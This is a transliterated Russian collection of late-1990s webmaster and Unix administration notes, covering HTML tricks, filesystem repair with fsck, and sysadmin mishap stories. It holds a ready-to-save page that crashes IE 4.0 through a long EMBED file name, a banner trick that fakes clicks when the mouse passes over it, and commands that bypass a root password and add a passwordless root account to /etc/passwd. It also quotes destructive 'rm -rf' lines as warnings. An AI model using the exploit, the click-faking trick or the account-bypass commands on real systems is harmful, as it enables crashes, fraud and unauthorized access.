e_club
>tets</a>

Samoklikaemoe pis'mo
<BASE HREF="file:///C|/test.html">
<HTML><HEAD><TITLE></TITLE>
<SCRIPT language="JavaScript">
<!--
B = open("http://www.ras.ru/~moshkow/")
blur(B)
//-->
</SCRIPT></HEAD><BODY></BODY></HTML>



> Byla ideya posylat' v nego soobshchenie kogda myshkoj nad bannerom provodyat.
> (Kogda banner interesen, chasto k nemu kursor podvodyat)
> No chto-to ya ne dopgr kak eto realizovat' bez hidden frame.

V pravilah ustanavlivaesh', chto u tebya _standartnyj kod_
tvoej setki soderzhit:

<!-- sobstvenno banner -->
<a href=http://koshelev.ru/cgi-bin/click>
<img src=http://koshelev.ru/cgi-bin/banner width=468 height=60>
</a>
<!-- kontrol'nosledovaya polosa shirinoj 1 piksel' -->
<A HREF=http://koshelev.ru/cgi-bin/bannerOver
onMouseOver="OpenLink()"; return true>
<img src=http://koshelev.ru/image/line.gif width=468 height=1>
</a>

Kogda klient budet snizu _peresekat'_ mysh'yu tvoyu odnopiksel'nuyu
polosku budet avtoklik, a chtob klienta ne napryagat' -
puskaj tvoj http://koshelev.ru/cgi-bin/bannerOver
vozvrashchaet kod 204 No Content - t.e. _ne perehodit'_ na link a
ostat'sya na staroj stranice.

&dDSsylka na kotoruyu perehodyat avtomaticheski&d@

     <A HREF="metacont.html" onMouseOver="OpenLink()"; return true>
     Dostatochno navesti na etu ssylku mysh', </a> i brouzer pojdet po
linku - bez klika.

<script language="JavaScript">
<!-- Hiding
   function OpenLink()
   {alert(
"Sejchas budet zagruzka drugoj stranicy, chtoby ujti nazad nazhmite BACK");
location=("http://www.nevapress.spb.ru/kulichki/metacont.html");
   }
// end hiding contents -->
</script>

        &dDProstye eksplojty&d@
MSIE 4.0. 4.01 can be crashed with a little help of the < EMBED > tag.

&lt;EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________&gt;
opens a dialog box and closes IE 4.0. the long file extension causes stack overrun.
--------cut here and save as crashmsie.html---------------------
<HTML>
Trying to crash IE 4.0
&lt;EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
                                                               40
80                                                                               160                    170                 180                 190          200
&lt;/HTML>
---------------------------------------------------------------
        &dDZakrytie katalogov dlya vneshnih klientov&d@

Sozdaem v kataloge fajl   .htaccess         takogo soderzhaniya

<Limit GET>
order deny,allow
deny from all
allow from polimos.ras.ru localhost
</Limit>

<Location /e>
AuthType Basic
AuthName lenta.ru
AuthUserFile /home/www/passwd
# moshkow:1HrhNpfYnwTau    standartnyj crypt()
require valid-user
</Location>

        &dDSm. tak zhe&d@

Konstantin Okrainec. Uchebnik po HTML iz Dubny ¡ http://sundg0.jinr.dubna.su/wguide/
Frejmy i prochie dopolneniya, voznikshie v HTML 2.0 i HTML 3 ¡ ../WEBMASTER/html20new.txt
.
        &dDRemont razrushennyh fajlovyh sistem&d@

Prakticheski  edinstvennoe  sredstvo  lecheniya  razrushenij fajlovoj sistemy vo
vseh Unix - utilita &dDfsck&d@. Esli ne lechit ona, to delo vashe pochti  beznadezhno.
YA by posovetoval v morg, no entuziasty mogut eshche nemnogo podergat'sya.

        &dD * LINUX * &d@

Primechanie:   komandy   privedennye  v  primerah  sleduet  vypolnyat'  tol'ko
vnimatel'no vzvesiv vozmozhnye posledstviya. Poetomu v primerah real'nye
imena specfajlov razdelov zhestkogo diska zameneny na &dD/dev/hd-name&d@
(v real'noj zhizni primenyaetsya /dev/hda2, /dev/hdb3 /dev/sda1...)

Tonkaya rihtovka fs &dDtune2fs&d@ pozvolyaet pomenyat' nastraivaemye parametry
fajlovoj sistemy -c max-mount-counts -m reserved-blocks-percentage i t.p.

    tune2fs -m 1 /dev/hd-name # najdet vam eshche 50Mb svobodnogo mesta,
              # i pozvolit uchinit' na ostavshemsya klochke
              # svobodnogo mesta katastroficheskuyu fragmentaciyu

Standartnoe lechenie fajlovoj sistemy:

    fsck -y -c -f /dev/hd-name

Forsirovannoe lechenie s proverkoj i "zameshcheniem" bad-blokov

    fsck -y -c -f /dev/hd-name
 # -y   neinteraktivnoe lechenie "yes" na vse voprosy
 # -c   najti bad-bloki readonly testom i perenesti v inod bad-blokov
 # -f   forsirovat' proverku (ignorirovat' flag "fs is clean"

Esli pogib osnovnoj superblok, dobavit' klyuch -b 8193 ili -b 16385  ...
ukazav zapasnuyu kopiyu. Nomera zapasnyh sb soobshchaet pri razmetke razdela
utilita newfs. (Vy konechno zhe sohranili ee listing?)

Raspechatat' razmeshchenie sluzhebnyh struktur fs i parametry suberbloka
mogut komandy &dDtune2fs -l&d@ i  &dDdumpe2fs&d@

    tune2fs /dev/hd-name
    dumpe2fs /dev/hd-name

Esli  pogibli  _vse_ kopii superbloka - poslednij shans &dDmke2fs -S&d@  propisat'
_tol'ko_ struktury superblokov i opisateli grupp, ne trogaya samih dannyh

    mke2fs -S /dev/hd-name  # Write  superblock and group descriptors only
    fsck -y  /dev/hd-name   # srazu vsed za etim zapustit' fsck

I  dazhe  eto  eshche  ne  konec.  Dlya  sil'nyh duhom ostaetsya otladchik fajlovoj
sistemy &dDdebugfs&d@

    man debugfs

        &dDPovedenie v avarinoj situacii&d@

Estestvenno, celee budete, esli zagruzites' v single-user mode
Dlya etogo perehvatit' pri zagruzke LILO-prompt (Left-alt)
I v komandu zagruzki dobavit' parametr single

Lilo: &dDlinux single&d@

V  linux'ovskij  single-user  mozhno popast' tol'ko znaya parol' root. Ne znaya
parolya, nado gruzit'sya tak:

Lilo: linux init=/bin/sh

ili dazhe tak (esli podgotovlena rescue-disketa s fajlovoj sistemoj unix)

Lilo: linux init=/bin/sh root=/dev/fd0H1440

Peremontirovat' kornevoj razdel iz readonly v write

     mount -t ext2 -n -o remount,rw /dev/hd-root /

Smontirovat' razrushennuyu fs, ispol'zuaya al'ternativnyj superblok

     mount -t ext2 -o sb=8193,nocheck /dev/hd-name /mntname

Pdrobnosti (vy budete smeyat'sya):

     man mount
.
        &dDMaksim Moshkov. Istorii iz zhizni administratora Unix, ili Grabli&d@

        &dDIstoriya 1 so schastlivym koncom. Isporchennyj /etc/passwd&d@

&dD
> Odin tovarishch (ne ya :), eto iz Komi) reshil  svoemu root'y vmesto polozhennogo
> /sbin/sh sdelat' /bin/ksh
> Dlya chego otredaktiroval /etc/passwd, no neudachno, oshibsya i naznachil
> /sbin/ksh.
> Probovali:
> $ su root -c /sbin/sh
> Ne pomoglo. Teper' on gor'ko plachet i hakera zovet.
> Mozhesh' pomoch', ili surovoe: pereustanovi yunih?
&d@

|to  my prohodili. Klassika.  Pervo- napervo "nikogda, NIKOGDA
ne menyaj shell u superyuzera..." :-)

0. Zapustit' shell iz-pod root'a vse-taki mozhno: su root -m -s /bin/sh
     No  esli  eshche  i  parol' zabyt, togda - pomozhet zagruzka v
single user mode ili zagruzka s CD/floppy/tape

1.  Dat'  komandu  df,  posmotret'  minor/mazhor  u  devajsa, na
kotoryj montiruetsya koren', i zatem pochitat' manual po komande

   mknod    # mkdev, mknode, mksf -  sozdat' special'nyj fajl
            # ili kak tam eshche ona nazyvaetsya

i zapisat' na bumazhke komandu, kotoroj sozdaetsya
spec-fajl /dev/root (ili kuda tam montiruetsya "/"

2. Zagruzit'sya s installyacionnogo strimmera/diskety/CD.
i tam gde uhod na install/update/system maintance pojti na
"system maintence" (eto vsego navsego shell root'ovyj)

Ostalos' smontirovat'   /dev/root na /mnt
i redaktirovat' /mnt/etc/passwd

&dDZasada No 1&d@

Srazu    posle   zagruzki   mini-sistemy   special'nyh   fajlov
sootvetstvuyushchih zhestkomu disku net (!). Sdelat' ego  ruchkami  -
komanda mknode uzhe zapisana na bumazhke.

&dDZasada No 2&d@

Redaktor  vi  ne  zapuskaetsya  (Net  terminfo)  Nu i chert s nim.
Pridumaesh' chto nibud'.  Naprimer

echo "toor::0:0:Yet another Super-User:/:" >> /mnt/etc/passwd
                                                 ^^^^^^

obrati vnimanie chto >>   a ne >  (Ugadaj pochemu :-)


a mozhno i tak:
PATH=$PATH:/mnt/bin:/mnt/usr/bin export PATH
TERMINFO=/mnt/usr/lib/terminfo   # ili gde on tam

Koroche  -  ty  doma  potrenirujsya, a potom v Komi napishi tochnye
imena fajlov i komand, a  to  boyus'  neobuchennyj  admin  smozhet
promahnut'sya paru raz, a zdes' promahivat'sya nel'zya.

     Prilozhenie: Obhod root passwd v Motorola Unix SVR4/88.

     1. Posmotret' major/minor dlya / i /usr

104  0  /dev/root
104  3  /dev/dsk/m197_c0d0s3

     2. Zagruzka s lenty, uhod na maintance .
     3.   Podmontirovat'   razdely   diska,  sootvetstvuyushchie  /  i  /usr,  s
vosstanovleniem fajlovoj sistemy (t.k. sistema  byla  vyklyuchena  nekorrektno
pri otsutstvii root parolya).

mkdir /mnt
mknod /dev/rootn b 104 0
/etc/fs/ufs/fsck /dev/rootn
mount -F ufs /dev/rootn /mnt

     analogichno dlya /usr

mknod /dev/usr3 b 104 3
/etc/fs/ufs/fsck /dev/usr3
mount -F ufs /dev/usr3 /mnt/usr

     4. Otredaktirovat' /etc/passwd, sdelat' besparol'nogo root

echo "toor::0:1:Adm:/:/sbin/sh" >> /mnt/etc/passwd

     5. Cmenit' koren' root'u (budet v /mnt)

chroot /mnt /sbin/sh

     6. Obnovit' shadow

pwconv

Vse.

        &dDIstoriya 2 pochti o tom zhe. Isporchennyj /etc/fstab&d@

 Date: 20 Apr 1997
 From: Bernshtam Pavel (barnshte@CS.bgu.ac.il)

U  menya  tozhe  bylo  - zaportil ya /etc/fstab i sdelal reboot ne
zametiv oshibki - babah - podnimaetsya (a eto byl  Axil  s  SunOS
4.1) v single user.

ya delayu ls - Command not found - ponyatno - ne zamountil /usr

posmotrel ya na drugom SUN'e chto est' v /sbin - nashel mount,
obradovalsya - sdelal /sbin/mount /usr.

Est' VI!

Pomuchalsya  poka  ustanovil nuzhnyj set TERM s polchasa - zapustil
VI.  otkryvayu fstab - fignya so strokami (vot ono - ne rabotajte
v  PICO, uchite VI !!!), ispravil, save'lyu - a root partition to
READ ONLY !!!

Delayu stop-A.

Slava bogu, posovetovali mne, chto v boot-monitore mozhno sdelat'
b  -rw  (zamauntit'  s  write),  posle  etogo  ya  povtoril  vsyu
proceduru s mount i VI i ispravil /etc/fstab.

a... eshche zabyl - VI ne zapuskalsya poka ya /var ne zamauntil, t.k
/tmp - link na /var/tmp , a VI bez /tmp ne idet.

<i>/*  a  na Linux special'naya komanda est' - peremontirovat'sya na
read-write - ee iz single-user-mode mozhno vypolnit'

mount -n -o remount /
*/</i>

        &dDKomanda  rm -rf v SCO&d@

     Vvidu  togo,  chto  pod  shablon  ".*" podhodit katalog ".."
NIKOGDA NE DELAJTE KOMANDY rm -r .*

     (Bol'shinstvo unix'ov  proshchayut podobnuyu oshibku, no NE VSE)

&dD
 From: Pavel Severov

"...  reshil  ya  na  nashem  SCO-shnom servere s Oraclovskoj bazoj
raschistit' nemnogo svobodnogo mesta na diske..."

  # cd /usr/tmp
  # rm -rf *

glyazhu, a tam vsyakij hlam ostalsya /usr/tmp/.X11-0 nu i t.p.
A ya togda

  # rm -rf .*   # OJ!

  # du
ldd: Can not open file
  # df
ldd: Can not open file
  # ls -al
ldd: Can not open file

&d@
. . .

     U  etoj  istorii  grustnyj  konec.  Vy uzhe dogadalis', chto
/usr/tmp/.* soderzhit v sebe /usr/tmp/..  Posle reboot'a mashina,
ne najdya kataloga /usr uzhe ne ozhila.

        &dDUdalennyj dostup ili "Zapasnoj klyuch ot sejfa lezhit v sejfe"&d@

     Horoshaya  shtuka, Unix + TCP/IP - mozhno otkonfigurit' mashinu
u cherta na kulichkah ne vstavaya  s  rabochego  mesta  i  dazhe  ne
vyhodya iz doma.

     &dDIstoriya  1.&d@  Vot  i  ya odnazhdy menyal to li IP-adres, to li
routing na udalennoj mashine... Koroche - promahnulsya, skazal

ifconfig eth0 down

     Vot sobstvenno i vse. Skazat'
ifconfig eth0 NEW-IP    bylo uzhe nekomu.

     Vy konechno dogadalis', chto _NADO BYLO_ odnoj strokoj pisat'
ifconfig eth0 down ; ifconfig eth0 NEW-IP up ; route add ...

     &dDIstoriya 2.&d@ Zahotelos' povysit' uroven' security. Pishem
v /etc/hosts.deny
ALL:ALL

v /etc/hosts.allow
ALL:193.263.12.13
        ^^^  vrode by  malen'kaya oshibochka, cifry perestavit', a
nel'zya - ya uzhe uspel otloginit'sya.

        &dDUdalennyj "dostup" ili "Klyucha voobshche net"&d@

     Povis   u   nas   odnazhdy   server,   nado  reset  nazhat',
peregruzit', a komnata zaperta, i klyuchi uzhe unesli. I telnet'om
ne vojdesh' - nekuda.

     Vyrubili svet na vsem etazhe, vklyuchili vnov' - voila!

        &dDNovaya /lib/libc.so - apgrejd LIB C&d@

      Linux. 1993 god. Potrebovalos' podmenit' LibC. Nu, vpered,
delov-to - staruyu peredvinut', novuyu - na ee mesto.

 cd lib
 mv libc.so libc.so-old
 mv libc.so-new libc.so
ldd: Can not execute, shared library not found
     Finish.

     Prishlos' gruzit'sya s diskety, montirovat' hd.

     No,  kak  eto  ni  smeshno,  v sleduyushchij raz te zhe komandy,
zapisannye v odnu stroku, srabotali.  Ili  bibliotechka  v  keshe
okazalas'...  Temna  voda  v Linuxe. Vprochem, fajly iz kataloga
/sbin - obychno staticaly-linked -  im  dlya  raboty  razdelyaemaya
libc bez nadobnosti.

        &dDIstoriya 1. Trusted mode - bezopasnost' prevyshe vsego&d@

     V HP-UX novichki administratory ochen' lyubyat sam'om poigrat'
- GUI, myshinyj interfejs  -  administriruj  na  zdorov'e.   Vot
tol'ko chitat' soobshcheniya nado - a oni po-anglijski vse.
     Ochen' legko, odnim "Ok" v SAM vklyuchaetsya perevod sistemy v
trusted rezhim. Vklyuchayut, i ne zamechayut. A zamechayut  cherez  paru
dnej, kogda s treh raz ne ugadayut parol' root. V trusted rezhime
login posle etogo blokiruetsya sovsem,  a  drugogo  yuzera  PERED
|TIM zavesti - ne dogadyvayutsya.

     Kak  vsegda  -  nas  spaset  single  user  mode:  perehvat
zagruzki v prompt IPL i zatem

 IPL> hpux -is

A zatem zapusk sam. I perekonvertirovat' sistemu v "untrusted"

 # mount -a
 # sam

     No  esli  vy uhitrilis' eshche i parol' na boot vklyuchit' - to
pomogajte sebe sami.

        &dDIstoriya 2. Security class C2: o tom zhe, no v SCO&d@

Security  class  C2 - eto povyshennaya bezopasnost'. I povyshennyj
gemorroj dlya pol'zovatelej. I dlya administratora - tozhe.
     Privelos' nam pozvonit' na zashchishchennuyu SCO mashinu iz Moskvy
v Piter, po modemu. Skorosti getty s pervogo raza podobrat'  ne
smogli,  na  login  proryvalsya  6-bitnyj  musor,  posle tret'ej
popytki vmesto getty Login my uvideli "Intruder  attempts,  tty
line /dev/modem disabled".

CHerez paru nedel' hozyain mashiny vernulsya v Piter i vernul getty.

        &dDScreen-sejver i knopka Enter&d@

Kogda  screen-saver gasit ekran, chto vy nazhimaete? Ne znayu, kak ostal'nye, a
ya zhmu klavishu CTRL.

Odin moj znakomyj reshil pochistit' katalog /tmp. Iz-pod root'a.  nabiraet on

  rm -rf /tmp/*, tochnee hochet nabrat', poskol'ku v moment
  rm -rf /_ zvonit telefon i ego kuda-to vyzyvayut.

CHerez  chas  on  vernulsya,  uvidel  pogashennyj  ekran, i nazhal _svoyu_ lyubimuyu
klavishu. Ugadajte, kakuyu?
.